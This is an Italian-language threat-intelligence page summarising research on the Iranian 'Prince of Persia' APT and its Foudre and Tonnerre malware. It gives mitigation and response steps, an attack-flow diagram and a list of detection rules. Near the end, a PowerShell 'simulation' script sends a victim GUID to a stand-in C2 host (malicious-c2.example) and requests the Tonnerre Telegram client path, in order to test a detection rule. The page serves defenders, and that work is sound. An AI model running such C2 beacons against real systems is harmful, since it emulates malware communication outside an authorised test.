Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il rapporto profila il cluster APT iraniano legato allo stato soprannominato Prince of Persia e traccia la sua progressione nell’ultimo decennio, con enfasi sull’attività osservata dal 2023 al 2025. Gli operatori si affidano a famiglie di malware su misura, tra cui Foudre, Tonnerre, MaxPinner, Rugissement e Deep Freeze, per supportare lo spionaggio e il furto sistematico di dati. Le versioni recenti introducono algoritmi di generazione di domini, command and control basato su Telegram e payload crittografati in SFX per migliorare la resilienza e il mascheramento. Gli obiettivi spaziano dalle infrastrutture critiche alle reti collegate a dissidenti in diverse regioni.
Indagine
I ricercatori di SafeBreach hanno seguito le operazioni del gruppo dal 2019 in avanti, raccogliendo nuovi campioni, documentando l’architettura C2 e analizzando la logica DGA. Hanno decrittografato i payload protetti, estratto credenziali di bot Telegram e costruito una cronologia dei rilasci delle varianti. La ricerca evidenzia infrastrutture di produzione e test separate e dettaglia comportamenti di file-drop legati a catene d’infezione guidate da Excel. Gli indicatori di compromissione sono stati assemblati a partire da hash di malware, domini e URL.
Mitigazione
Monitora l’attività DNS per i pattern di DGA identificati, blocca i domini malevoli noti e restringi o ispeziona il traffico relativo ai bot Telegram. Aggiungi rilevazioni per i nomi di file di malware menzionati e gli artefatti dei loader DLL, e usa il monitoraggio/sinkholing DNS per esporre l’infrastruttura in rotazione. Implementa la lista di applicazioni consentite e rinforza la sicurezza di Office limitando le macro per ridurre la probabilità di accesso iniziale.
Risposta
Se si trova un indicatore, metti in quarantena il sistema interessato, cattura le evidenze volatili ed esegui analisi mirate sui file scaricati e sui percorsi di registro rilevanti. Blocca tutti i domini e gli indirizzi IP collegati, ruota i token dei bot Telegram esposti e reimposta le credenziali per gli account impattati. Cerca in tutto l’ambiente i resti dei loader DLL personalizzati e dei payload crittografati SFX per garantire un’eradicazione completa.
“graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ffcc99 classDef tool fill:#ffe699 classDef file fill:#ccffcc classDef process fill:#ffdddd classDef operator fill:#ff9900 %% Node definitions action_initial[“<b>Azione</b> – <b>T1566.001 Spearphishing Attachment</b><br/>La vittima riceve un allegato Excel malevolo”] class action_initial action file_excel[“<b>File</b> – Excel malevolo con macro<br/>Rilascia ccupdate.tmp”] class file_excel file malware_foudre[“<b>Malware</b> – Foudre (ccupdate.tmp)<br/>Payload SFX crittografato”] class malware_foudre malware process_macro[“<b>Processo</b> – Esecuzione macro”] class process_macro process action_execution[“<b>Azione</b> – <b>T1204.002 Esecuzione Utente: File Malevolo</b><br/>La vittima apre Excel”] class action_execution action action_obfuscation[“<b>Azione</b> – <b>T1027.009 Payload Incorporati</b><br/>Payload crittografato e camuffato”] class action_obfuscation action file_camDLL[“<b>File</b> – DLL camuffata da video MP4”] class file_camDLL file action_deobfuscate[“<b>Azione</b> – <b>T1140 Deoffuscare/Decodificare File</b><br/>Decrittografa il payload con password hardcoded”] class action_deobfuscate action process_decrypt[“<b>Processo</b> – Routine di decrittazione”] class process_decrypt process action_dga[“<b>Azione</b> – <b>T1568.002 Risoluzione Dinamica (DGA)</b><br/>Genera domini LOS1, FTS1, u2026”] class action_dga action process_dga[“<b>Processo</b> – Algoritmo di generazione domini”] class process_dga process action_webc2[“<b>Azione</b> – <b>T1102.002 Servizio Web Comunicazione Bidirezionale</b><br/>HTTP GET con GUID, versione, informazioni utente”] class action_webc2 action process_http[“<b>Processo</b> – Richiesta/risposta HTTP”] class process_http process action_telegram[“<b>Azione</b> – Uso di Bot Telegram per C2”] class action_telegram action file_tga[“<b>File</b> – tga.adr (client bot Telegram)”] class file_tga file process_telegram[“<b>Processo</b> – Comunica tramite API di Telegram usando token bot”] class process_telegram process action_exfil[“<b>Azione</b> – <b>T1041 Esfiltrazione Tramite Canale C2</b><br/>Carica file rubati nelle directory C2”] class action_exfil action file_exfil[“<b>File</b> – Nomi di file codificati, contenuto crittografato”] class file_exfil file action_data_obfusc[“<b>Azione</b> – <b>T1001 Offuscamento Dati</b><br/>Archivia dati esfiltrati con nomi codificati e crittografia”] class action_data_obfusc action %% Connections showing flow action_initial u002du002d>|consegna| file_excel file_excel u002du002d>|rilascia| malware_foudre malware_foudre u002du002d>|esegue tramite| process_macro process_macro u002du002d>|porta a| action_execution action_execution u002du002d>|attiva| action_obfuscation action_obfuscation u002du002d>|usa| file_camDLL action_obfuscation u002du002d>|porta a| action_deobfuscate action_deobfuscate u002du002d>|esegue| process_decrypt process_decrypt u002du002d>|produce| malware_foudre malware_foudre u002du002d>|inizia| action_dga action_dga u002du002d>|esegue| process_dga process_dga u002du002d>|risolve in| action_webc2 action_webc2 u002du002d>|usa| process_http process_http u002du002d>|scarica| file_tga file_tga u002du002d>|abilita| action_telegram action_telegram u002du002d>|usa| process_telegram process_telegram u002du002d>|esfiltra tramite| action_exfil action_exfil u002du002d>|archivia come| file_exfil file_exfil u002du002d>|applica| action_data_obfusc “
Flusso di Attacco
Rilevazioni
Possibile abuso di Telegram come canale di Comando e Controllo (via dns_query)
Visualizza
Possibile infiltrazione/esfiltrazione dati/C2 tramite servizi/strumenti di terze parti (via proxy)
Visualizza
Comando e controllo sospetto tramite richiesta DNS con dominio di alto livello (TLD) insolito (via dns)
Visualizza
Esecuzione sospetta di Taskkill (via cmdline)
Visualizza
IOC (HashSha256) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio Parte 2
Visualizza
IOC (SourceIP) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio
Visualizza
IOC (HashSha256) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio Parte 1
Visualizza
IOC (HashMd5) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio
Visualizza
IOC (DestinationIP) da rilevare: 18 DIC 2025 Prince of Persia: Un decennio di attività APT dello stato-nazione iraniano al microscopio
Visualizza
Rilevazione di infezione Foudre v34 tramite file Excel con eseguibile incorporato [Creazione di Processo Windows]
Visualizza
Rilevazione di comunicazione C2 di Foudre e Tonnerre [Connessione di Rete Windows]
Visualizza
Esecuzione Simulazione
Prerequisito: Il controllo pre-volo della Telemetria e Baseline deve essere superato.
Motivazione: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (T1584.005) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTPs identificate e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento.
-
Narrazione e Comandi dell’Attacco:
L’attore della minaccia ha fornito un dominio malevolomalicious-c2.exampleche ospita il server C2 di Foudre/Tonnerre. Il payload dell’attaccante sulla macchina della vittima esegue due richieste HTTP GET:- Invia il GUID della vittima al punto finale Foudre C2 utilizzando il percorso
/1/?c=<GUID>. - Contatta l’API di Telegram tramite il back-door di Tonnerre usando il percorso
/t/tga.adr.
Entrambe le richieste vengono effettuate tramite HTTP (per semplificare la registrazione del proxy) e includono un generico User-Agent per integrarsi con il traffico normale. Le azioni generano i campi esatti (
request_method=GET,urlcontenenti le sottostringhe mirate) che la regola Sigma osserva. - Invia il GUID della vittima al punto finale Foudre C2 utilizzando il percorso
-
Script di Test di Regressione:
# ------------------------------------------------------------ # Simulazione Comunicazione C2 Foudre & Tonnerre (Windows) # ------------------------------------------------------------ # 1. Definire GUID della vittima (in una vera infezione sarebbe letto dal registro) $guid = (New-Guid).Guid # 2. Definire host C2 malevolo (sostituire con un indirizzo che si controlla per testare) $c2Host = "http://malicious-c2.example" # 3. Invia GUID al punto finale Foudre C2 $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] Inviando GUID a Foudre C2: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Contattare l'API di Telegram tramite il back-door di Tonnerre $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Contattando endpoint API di Telegram: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] Simulazione completa. Controllare SIEM per gli avvisi."Lo script è autonomo; eseguirlo su un host Windows che instrada il traffico tramite il proxy configurato produrrà due voci di log che corrispondono alla regola Sigma
url|containscondizioni. -
Comandi di Pulizia:
# Rimuovi eventuali connessioni di rete temporanee (solo rilevanti se il proxy crea sessioni persistenti) # Qui semplicemente svuotiamo la cache DNS per evitare la risoluzione residua dell'host malevolo. ipconfig /flushdns Write-Host "[*] Pulizia completa."